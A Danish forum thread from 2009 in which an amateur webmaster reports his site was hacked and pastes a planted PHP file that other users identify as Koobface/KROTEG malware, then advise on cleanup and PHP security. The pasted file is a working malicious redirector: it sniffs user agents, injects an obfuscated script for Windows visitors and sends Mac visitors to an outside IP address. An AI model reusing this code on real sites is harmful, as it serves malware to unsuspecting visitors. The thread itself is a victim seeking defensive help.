Avatar billede hcthorsen Praktikant
12. oktober 2009 - 17:30 Der er 6 kommentarer og
1 løsning

Min hjemmeside er blevet hacket..... Hvad gør man lige ved det?

Jeg opdager til min gru at der ligger nogle mapper på min hjemmeside som jeg ikke selv har lagt op. Jeg har ikke lige fået kigget det hele igennem, så jeg ved ikke hvilken skade filerne gør, men jeg er da ikke stolt af situationen. Det må jo betyde at der er nogen der har hacket mit password, eller hvad? Man kan vel ikke uploade noget til mit domæne uden at have mit password? Jeg har ikke lagt nogen scripts på hjemmesiden der giver mulighed for upload. Hvad gør man nu, og hvordan sikrer jeg mig mod gentagelser? I den ene folder ligger følgende index-fil:

<?
$script_fn = "qowah-1ieqch.js";
$pic_fn = "i9ezrsby8om.jpg";

if (isset($_GET['test']) && $_GET['test']==1)
{
    $a = file($script_fn);
    if (trim($a[0]) == '// KROTEG') {
        print "KROTEG";
    }
    exit();
}

function folder_rand() {
    $fold = "";
    $count_ch = rand(7, 15);
    //$alf = "abcdefghijklmnopqrstuvwxyz0123456789";
    $alf = "abcdefghijklmnopqrstuvwxyz";
    for ($i=0; $i<$count_ch; $i++) {
        $fold .= $alf[rand(0, strlen($alf)-1)];
    }

    return $fold;
}

if ($script_fn != "") {
   

    if (strpos($_SERVER['HTTP_USER_AGENT'],'Windows')) {

        $rscript = folder_rand()." ".folder_rand()."\n";
        $rscript .= '<scr'.'ipt sr'.'c="'.$script_fn.'"></scr'.'ipt>'."\n";
        $rscript .= folder_rand()." ".folder_rand()."\n";
       
    }
    elseif (strpos($_SERVER['HTTP_USER_AGENT'],'Macintosh')) {
        header("Location: http://61.235.117.83/mac.php");
    }
    else {
       
        $rscript .= "<title>Amazing Video</title>\n";
        $rscript .= folder_rand()." ".folder_rand()."\n";
        $rscript .= "<img src=".$pic_fn.">\n";
        $rscript .= folder_rand()." ".folder_rand()."\n";
   
    }       
       
   
}


print $rscript;
exit();
?>
<html>
<head>
<title>Hello</title>
</head>
<body>
hey rogazi
</body>
</html>
Avatar billede j4k0b Nybegynder
12. oktober 2009 - 17:33 #1
Hvor har du din side hostet? Har du købt et webhotel ude i byen, bør du nok give besked til din udbyder da de helt sikkert vil følge op på sagen. Kan de se at nogen har hacket dem så ender det højst sansynligt med en politianmeldelse.
Avatar billede zips Juniormester
12. oktober 2009 - 17:43 #2
Det ser ud til du har fået denne virus http://r3v3rs3e.wordpress.com/tag/kroteg/

Om det er dig eller din web udbyder som har fået den virus er ikke godt at vide, så tjek din egen computer for virus så du er sikker på du ikke har den, brug denne guide til at tjekke den computer http://www.eksperten.dk/guide/1296
Avatar billede hcthorsen Praktikant
12. oktober 2009 - 18:15 #3
Ja, det er sgu nok koobface der er skurken. Troede jeg var af med den. Skræmmende at den kan lægge sig op på mit webhotel. Smidder I ikke begge et svar? Takker for hjælpen.
Avatar billede zips Juniormester
12. oktober 2009 - 18:38 #4
Her er et svar :-)
Avatar billede leif Seniormester
12. oktober 2009 - 21:24 #5
Om den kan komme op på din side afhænger af mange ting.

Hvis din side er kodet i PHP og du ikke har sikret dig at lukke alle sikkerhedshuller så kan hvem som helst med lidt viden evt. ændre, uploade og slette din side. Hvis du altså ikke har sikret dig nok. Er din hjemmeside et standard system fx. Wordpress, Joomla eller andet er det vigtigt at holde systemet opdateret med seneste nye version hele tiden.

Det kan også være kommet igennem et hul hos udbyder, men bruger du et standard system er det mere sandsynligt kommet igennem et hul i det.
Avatar billede hcthorsen Praktikant
13. oktober 2009 - 09:22 #6
Min side er lavet med hjemmestrikket php, så det kan da godt have sneget sig et enkelt hul ind eller 2. Jeg er en simpel amatør, så jeg har ikke sikret mig mod andet end sql-injektion. Jeg har ingen upload-scripts på siden. Er der andre sikkerhedshuller jeg skal tænke på?

Jeg har scannet for virus, som foreslået på http://www.eksperten.dk/guide/1296, uden at finde noget. Normalt burger jeg , men ville egentlig gerne betale for et ordentligt virus-program. Jeg kan bare ikke skelne skidt fra kanel. Jeg har tidligere betalt for Norton uden at det gjorde noget godt for mig. Er der nogen der kan anbefale et godt allround-program?
Avatar billede zips Juniormester
13. oktober 2009 - 13:00 #7
Nu du har scannet din computer for virus og malware bør du scanne alle dine webfiler som du har på din computer, søg efter dette navn "KROTEG"

Derefter hent alle filer fra dit webhotel og rens den for uønsket script, inden du lægger dem op igen er du nød til at se om du har et sikkerheds hul i din php, gå dine logfiler igennem og se om du kan finde noget mistænkeligt, er der det vil du kunne se hvilken fil det er sket igennem.

Udfra det du skriver i #3 har du haft den virus før, så der er jo et sikkerheds hul et eller andet sted.

Man behøver ikke et upload script for at nogen kan komme ind på din server, en simpel php linje er nok til at du har et hul, her er lidt om sikkerhed http://www.phpbegynder.dk/artikler.php?id=24&page=1
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Vi tilbyder markedets bedste kurser inden for webudvikling

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester